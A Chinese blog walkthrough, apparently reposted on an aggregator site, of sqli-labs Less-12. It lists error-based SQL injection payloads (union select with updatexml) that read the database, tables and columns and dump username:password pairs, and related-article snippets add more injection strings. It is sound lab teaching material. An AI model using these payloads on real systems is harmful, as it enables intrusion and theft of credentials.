網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析

2年前作者：秋說(shuō)分類(lèi)：Toy博客閱讀(16)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

原理及姿勢(shì)參考：[網(wǎng)絡(luò)安全]SQL注入原理及常見(jiàn)攻擊方法簡(jiǎn)析

本文使用到了updatexml函數(shù)，原理及姿勢(shì)可參考：[網(wǎng)絡(luò)安全]sqli-labs Less-5 解題詳析

判斷注入類(lèi)型

通過(guò)測(cè)試可知注入類(lèi)型為雙引號(hào)+括號(hào)注入

判斷注入點(diǎn)個(gè)數(shù)

網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析,網(wǎng)絡(luò)安全,# Sqli-Labs靶場(chǎng)攻防實(shí)戰(zhàn),web安全,安全,sql
嘗試可知注入點(diǎn)個(gè)數(shù)為2

查庫(kù)名

uname=1") union select 1,updatexml(1,concat(0,(select database()),0),1)#

網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析,網(wǎng)絡(luò)安全,# Sqli-Labs靶場(chǎng)攻防實(shí)戰(zhàn),web安全,安全,sql
庫(kù)名為security

查表名

uname=1") union select 1,updatexml(1,concat(0,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0),1)#

網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析,網(wǎng)絡(luò)安全,# Sqli-Labs靶場(chǎng)攻防實(shí)戰(zhàn),web安全,安全,sql

查users表的列名

uname=1") union select 1,updatexml(1,concat(0,(select group_concat(column_name) from information_schema.columns where table_name='users'),0),1)#

網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析,網(wǎng)絡(luò)安全,# Sqli-Labs靶場(chǎng)攻防實(shí)戰(zhàn),web安全,安全,sql

查字段

uname=1") union select 1,updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)#

網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析,網(wǎng)絡(luò)安全,# Sqli-Labs靶場(chǎng)攻防實(shí)戰(zhàn),web安全,安全,sql

總結(jié)

以上為[網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析，后續(xù)將分享[網(wǎng)絡(luò)安全]sqli-labs Less-13 解題詳析

我是秋說(shuō)，我們下次見(jiàn)。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-731228.html

到了這里，關(guān)于網(wǎng)絡(luò)安全]sqli-labs Less-12 解題詳析的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來(lái)自互聯(lián)網(wǎng)用戶(hù)投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請(qǐng)注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

Background-1 基礎(chǔ)知識(shí) sqli-Labs Less1-Less-4
在第一關(guān)我們可以嘗試增加一個(gè)單引號(hào)進(jìn)行嘗試錯(cuò)誤顯示如下：推測(cè)語(yǔ)法的結(jié)構(gòu) 上述錯(cuò)誤中我們可以推測(cè)由于增加了 1’ 導(dǎo)致語(yǔ)法變成 \\\'1\\\'\\\' limit 0,1 ,是由于多加了一個(gè) \\\' 造成的后果。下面是嘗試解決的方法嘗試 \\\' or 1=1--+ 把但單引號(hào)給閉合此時(shí)的語(yǔ)句構(gòu)成如下代碼段：接下
2024年02月08日
瀏覽(19)
[網(wǎng)絡(luò)安全]upload-labs Pass-17 解題詳析
讀者可參考、訂閱專(zhuān)欄：Upload-Labs靶場(chǎng)攻防實(shí)戰(zhàn) 蟻劍工具的使用可參考： [網(wǎng)絡(luò)安全]AntSword(蟻劍)實(shí)戰(zhàn)解題詳析(入門(mén)) [網(wǎng)絡(luò)安全]DVWA之File Upload—AntSword(蟻劍)攻擊姿勢(shì)及解題詳析合集后端邏輯代碼： imagecreatefrompng是PHP中的一個(gè)函數(shù)，用于創(chuàng)建一個(gè)新的圖像資源對(duì)象，并從PNG格
2024年02月06日
瀏覽(21)
sqli-labs通關(guān)詳解
找注入點(diǎn)，當(dāng)輸入id=1 and 1=2–+時(shí)沒(méi)有變化，嘗試單引號(hào)閉合找到注入類(lèi)型字符型注入，單引號(hào)閉合判斷字段數(shù) 找回顯點(diǎn) 發(fā)現(xiàn)有兩個(gè)回顯點(diǎn) 開(kāi)始信息收集(注意union前后格式要相同) 開(kāi)始逐級(jí)爆破爆破數(shù)據(jù)庫(kù) 看源碼或者嘗試，沒(méi)有閉合方式，說(shuō)明為數(shù)字型注入嘗試找到注入
2023年04月15日
瀏覽(23)
SQLI-labs-第一關(guān)
目錄知識(shí)點(diǎn)：?jiǎn)我?hào)字符型注入 1、根據(jù)提示，為get注入，在url中輸入內(nèi)容?編輯 ?2、判斷注入點(diǎn) ?3、判斷目前該表的字段數(shù) ?4、判斷回顯位置 5、爆庫(kù)名 6、爆表名? ?7、爆字段名 ?8、爆值知識(shí)點(diǎn)：?jiǎn)我?hào)字符型注入思路： 1、根據(jù)提示，為get注入，在url中輸入內(nèi)容 ?
2024年02月11日
瀏覽(24)
sqli-labs靶場(chǎng)安裝
??服務(wù)器環(huán)境：phpstudy ??下載鏈接：https://www.xp.cn/ ??Sqlilabs靶場(chǎng)：sqlilabs ??下載鏈接：https://github.com/Audi-1/sqli-labs ??PhpStudy國(guó)內(nèi)12年老牌公益軟件，集安全，高效，功能與一體，已獲得全球用戶(hù)認(rèn)可安裝，運(yùn)維也高效。支持一鍵LAMP,LNMP,集群,監(jiān)控,網(wǎng)站,FTP,數(shù)據(jù)庫(kù),J
2023年04月13日
瀏覽(25)
Sqli-Labs 通關(guān)筆記
創(chuàng)建網(wǎng)站時(shí)選擇php版本為5.x 修改./sql-connections/db-creds.inc 修改數(shù)據(jù)庫(kù)用戶(hù)名和密碼，下面的數(shù)據(jù)庫(kù)名不用管任務(wù)目標(biāo)：獲取表名 Less-1 GET - Error based - Single quotes - String(基于錯(cuò)誤的GET單引號(hào)字符型注入) sql查詢(xún)語(yǔ)句為 SELECT * FROM users WHERE id=\\\'$id\\\' LIMIT 0,1 輸入 ?id=-1\\\' ，報(bào)錯(cuò)語(yǔ)句為
2023年04月20日
瀏覽(23)
sqli-labs例題復(fù)現(xiàn)
less-1.1 在源碼中$id=$_GET[\\\'id\\\'];之后加入如下代碼： 1.分析正則第一個(gè)b匹配select單詞邊界，sS匹配到所有字符，最后一個(gè)b匹配到from單詞邊界。 select...from被過(guò)濾，失效。 2.科學(xué)計(jì)數(shù)法的引入如果可以存在一個(gè)，可以加在from前面，不會(huì)影響語(yǔ)句執(zhí)行，從而實(shí)現(xiàn)繞過(guò)正則
2024年02月10日
瀏覽(21)
sqli-labs靶場(chǎng)分析
1、level1 單引號(hào)測(cè)試報(bào)錯(cuò)，為單引號(hào)閉合，且顯示1多了個(gè)單引號(hào)故而為字符型注入。且未對(duì)用戶(hù)輸入進(jìn)行任何過(guò)濾。且SQL語(yǔ)句錯(cuò)誤會(huì)輸出，可以使用報(bào)錯(cuò)注入 order by判斷表列數(shù) uoion 聯(lián)合查詢(xún)，因?yàn)榫W(wǎng)頁(yè)只顯示第一張表的數(shù)據(jù)，因此需要union前的語(yǔ)句為假，查出數(shù)據(jù)為空，把位
2024年02月07日
瀏覽(29)
sqli-labs部分關(guān)思路
目錄 updatexml 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 25a 26 26a 27 27a 28 28a 問(wèn)題：你了解sql注入嗎答：由于程序過(guò)濾不嚴(yán)謹(jǐn)，用戶(hù)異常輸入，這些輸入會(huì)導(dǎo)致數(shù)據(jù)庫(kù)異常查詢(xún)，最終導(dǎo)致sql注入 mysql三種注釋符： --+ # /**/ updatexml() 這個(gè)函數(shù)作用是替換數(shù)據(jù)，三個(gè)參數(shù)對(duì)應(yīng)
2024年02月09日
瀏覽(22)
sqli-labs關(guān)卡之一（兩種做法）
目錄一、布爾盲注(bool注入) ?二、時(shí)間盲注(sleep注入) 頁(yè)面沒(méi)有報(bào)錯(cuò)和回顯信息，只會(huì)返回正?；蛘卟徽５男畔?，這時(shí)候就可以用布爾盲注布爾盲注原理是先將你查詢(xún)結(jié)果的第一個(gè)字符轉(zhuǎn)換為ascii碼，再與后面的數(shù)字比較，如果為真，整個(gè)查詢(xún)條件就為真，返回正常的結(jié)果
2024年02月09日
瀏覽(26)